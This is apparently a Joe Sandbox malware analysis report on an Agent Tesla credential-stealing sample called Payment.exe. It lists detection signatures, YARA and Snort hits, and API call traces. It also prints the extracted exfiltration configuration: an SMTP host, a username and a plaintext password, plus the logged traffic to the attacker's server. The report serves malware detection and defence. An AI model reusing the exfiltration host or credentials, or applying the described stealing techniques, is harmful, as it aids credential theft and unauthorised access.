Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Payment.exe

Overview

General Information

Sample name:Payment.exe
Analysis ID:1432021
MD5:872fc876d25908a93236dcf98e09e3de
SHA1:06da1381d9aaa978ace25c409a59c3d6560975c0
SHA256:a6cd55461ca16e33b153c509417d91eec660cc6d447764c9a312a0ad871ca9c5
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected AgentTesla
Binary is likely a compiled AutoIt script file
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Payment.exe (PID: 3924 cmdline: "C:\Users\user\Desktop\Payment.exe" MD5: 872FC876D25908A93236DCF98E09E3DE)
    • RegSvcs.exe (PID: 5648 cmdline: "C:\Users\user\Desktop\Payment.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.italiacanda-it.com", "Username": "snpss@italiacanda-it.com", "Password": "dsrociz1               "}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmpINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
        • 0x334e9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
        • 0x3355b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
        • 0x335e5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
        • 0x33677:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
        • 0x336e1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
        • 0x33753:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
        • 0x337e9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
        • 0x33879:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
        00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 7 entries
            SourceRuleDescriptionAuthorStrings
            0.2.Payment.exe.2150000.1.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Payment.exe.2150000.1.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                0.2.Payment.exe.2150000.1.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x316e9:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x3175b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x317e5:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x31877:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x318e1:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x31953:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x319e9:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x31a79:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  2.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 4 entries

                    System Summary

                    barindex
                    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 208.91.198.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 5648, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49727
                    Timestamp:04/26/24-10:06:22.580286
                    SID:2030171
                    Source Port:49727
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:04/26/24-10:06:22.580370
                    SID:2855542
                    Source Port:49727
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:04/26/24-10:06:22.580370
                    SID:2855245
                    Source Port:49727
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:04/26/24-10:06:22.580370
                    SID:2840032
                    Source Port:49727
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected
                    Timestamp:04/26/24-10:06:22.580370
                    SID:2851779
                    Source Port:49727
                    Destination Port:587
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: 2.2.RegSvcs.exe.400000.0.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.italiacanda-it.com", "Username": "snpss@italiacanda-it.com", "Password": "dsrociz1 "}
                    Source: Payment.exeReversingLabs: Detection: 43%
                    Source: Payment.exeVirustotal: Detection: 36%Perma Link
                    Source: Payment.exeJoe Sandbox ML: detected
                    Source: Payment.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49725 version: TLS 1.2
                    Source: Binary string: wntdll.pdbUGP source: Payment.exe, 00000000.00000003.2152965174.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Payment.exe, 00000000.00000003.2153287366.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: Payment.exe, 00000000.00000003.2152965174.0000000003F80000.00000004.00001000.00020000.00000000.sdmp, Payment.exe, 00000000.00000003.2153287366.0000000003DE0000.00000004.00001000.00020000.00000000.sdmp
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B34696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00B34696
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00B3C9C7
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3C93C FindFirstFileW,FindClose,0_2_00B3C93C
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B3F200
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00B3F35D
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B3F65E
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B33A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B33A2B
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B33D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00B33D4E
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00B3BF27

                    Networking

                    barindex
                    Source: TrafficSnort IDS: 2855542 ETPRO TROJAN Agent Tesla CnC Exfil Activity 192.168.2.5:49727 -> 208.91.198.143:587
                    Source: TrafficSnort IDS: 2855245 ETPRO TROJAN Agent Tesla Exfil via SMTP 192.168.2.5:49727 -> 208.91.198.143:587
                    Source: TrafficSnort IDS: 2851779 ETPRO TROJAN Agent Tesla Telegram Exfil 192.168.2.5:49727 -> 208.91.198.143:587
                    Source: TrafficSnort IDS: 2840032 ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 192.168.2.5:49727 -> 208.91.198.143:587
                    Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.5:49727 -> 208.91.198.143:587
                    Source: global trafficTCP traffic: 192.168.2.5:49727 -> 208.91.198.143:587
                    Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                    Source: Joe Sandbox ViewIP Address: 104.26.12.205 104.26.12.205
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.5:49727 -> 208.91.198.143:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B425E2 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00B425E2
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: smtp.italiacanda-it.com
                    Source: RegSvcs.exe, 00000002.00000002.3389464276.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 00000002.00000002.3389464276.0000000003367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.italiacanda-it.com
                    Source: RegSvcs.exe, 00000002.00000002.3389464276.0000000003367000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                    Source: Payment.exe, 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: Payment.exe, 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3388297817.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.3389464276.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegSvcs.exe, 00000002.00000002.3389464276.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 00000002.00000002.3389464276.00000000032F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                    Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.5:49725 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, K6raBsUk6.cs.Net Code: _1kx
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B4425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B4425A
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B44458 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00B44458
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B4425A OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00B4425A
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B30219 GetKeyboardState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_00B30219
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B5CDAC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B5CDAC

                    System Summary

                    barindex
                    Source: 0.2.Payment.exe.2150000.1.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: C:\Users\user\Desktop\Payment.exeCode function: This is a third-party compiled AutoIt script.0_2_00AD3B4C
                    Source: Payment.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                    Source: Payment.exe, 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_df352232-5
                    Source: Payment.exe, 00000000.00000002.2156025250.0000000000B85000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f4793a40-7
                    Source: Payment.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_cf9b2c80-1
                    Source: Payment.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_2ba005b0-8
                    Source: initial sampleStatic PE information: Filename: Payment.exe
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B340B1: CreateFileW,_memset,DeviceIoControl,CloseHandle,0_2_00B340B1
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B28858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B28858
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B3545F
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00ADE8000_2_00ADE800
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AFDBB50_2_00AFDBB5
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00ADE0600_2_00ADE060
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B5804A0_2_00B5804A
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AE41400_2_00AE4140
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AF24050_2_00AF2405
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B065220_2_00B06522
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B0267E0_2_00B0267E
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B506650_2_00B50665
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AF283A0_2_00AF283A
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AE68430_2_00AE6843
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B089DF0_2_00B089DF
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B06A940_2_00B06A94
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B50AE20_2_00B50AE2
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AE8A0E0_2_00AE8A0E
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B38B130_2_00B38B13
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B2EB070_2_00B2EB07
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AFCD610_2_00AFCD61
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B070060_2_00B07006
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AE31900_2_00AE3190
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AE710E0_2_00AE710E
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AD12870_2_00AD1287
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AF33C70_2_00AF33C7
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AFF4190_2_00AFF419
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AE56800_2_00AE5680
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AF16C40_2_00AF16C4
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AE58C00_2_00AE58C0
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AF78D30_2_00AF78D3
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AF1BB80_2_00AF1BB8
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B09D050_2_00B09D05
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00ADFE400_2_00ADFE40
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AFBFE60_2_00AFBFE6
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00AF1FD00_2_00AF1FD0
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_021436600_2_02143660
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_017EE1C12_2_017EE1C1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_017EA9502_2_017EA950
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_017E4A982_2_017E4A98
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_017E3E802_2_017E3E80
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_017E41C82_2_017E41C8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C0A1982_2_06C0A198
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C0B9F02_2_06C0B9F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C165E82_2_06C165E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C155A82_2_06C155A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C1B2202_2_06C1B220
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C130602_2_06C13060
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C1C1702_2_06C1C170
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C17D782_2_06C17D78
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C176982_2_06C17698
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C1E3882_2_06C1E388
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C1034B2_2_06C1034B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C100072_2_06C10007
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_06C15CDB2_2_06C15CDB
                    Source: C:\Users\user\Desktop\Payment.exeCode function: String function: 00AD7F41 appears 35 times
                    Source: C:\Users\user\Desktop\Payment.exeCode function: String function: 00AF0D27 appears 70 times
                    Source: C:\Users\user\Desktop\Payment.exeCode function: String function: 00AF8B40 appears 42 times
                    Source: Payment.exe, 00000000.00000003.2149304388.0000000003EC3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment.exe
                    Source: Payment.exe, 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamed1d0086e-f958-473c-b56d-1a9de9dc0359.exe4 vs Payment.exe
                    Source: Payment.exe, 00000000.00000003.2155034288.00000000040AD000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment.exe
                    Source: Payment.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: 0.2.Payment.exe.2150000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 00000000.00000002.2157047386.0000000002150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, c2bZQnG.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, c2bZQnG.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, Q1L0K.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, Q1L0K.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: 0.2.Payment.exe.2150000.1.raw.unpack, uo1UBaEHa.csCryptographic APIs: 'TransformFinalBlock'
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/4@4/2
                    Source: C:\Users\user\Desktop\Payment.exeCode function: 0_2_00B3A2D5 GetLastError,FormatMessageW,0_2_00B3A2D5
